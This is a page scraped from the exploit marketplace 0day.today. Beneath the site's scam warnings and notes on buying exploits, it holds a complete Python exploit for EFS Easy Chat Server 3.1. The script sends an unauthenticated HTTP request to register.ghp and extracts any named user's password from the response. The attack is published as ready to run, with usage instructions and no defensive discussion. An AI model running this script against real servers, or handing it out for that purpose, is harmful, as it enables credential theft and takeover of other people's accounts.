0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
EFS Easy Chat Server 3.1 - Password Disclosure Exploit
# Exploit Title: Easy Chat Server Remote Password Disclosure # Date: 09/10/2017 # Software Link: http://echatserver.com/ecssetup.exe # Exploit Author: Aitezaz Mohsin # Vulnerable Version: v2.0 to v3.1 # Vulnerability Type: Pre-Auth Remote Password Disclosure # Severity: Critical # ========================================================================================================= # Registeration page 'register.ghp' allows disclosing ANY user's password. # Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password. # ========================================================================================================= # USAGE: python exploit.py ip username #!/usr/bin/python import urllib import re import requests import sys ip = sys.argv[1] username = sys.argv[2] url = 'http://' + ip + '/register.ghp?username=' + username + '&password=' response = requests.get(url) html = response.content pattern = '<INPUT type="password" name="Password" maxlength="30" value="(.+?)">' result = re.compile(pattern) password = re.findall(result,html) x = ''.join(password) password = x.replace("[", "") password = x.replace("]", "") print "Password: " + password # 0day.today [2024-11-15] #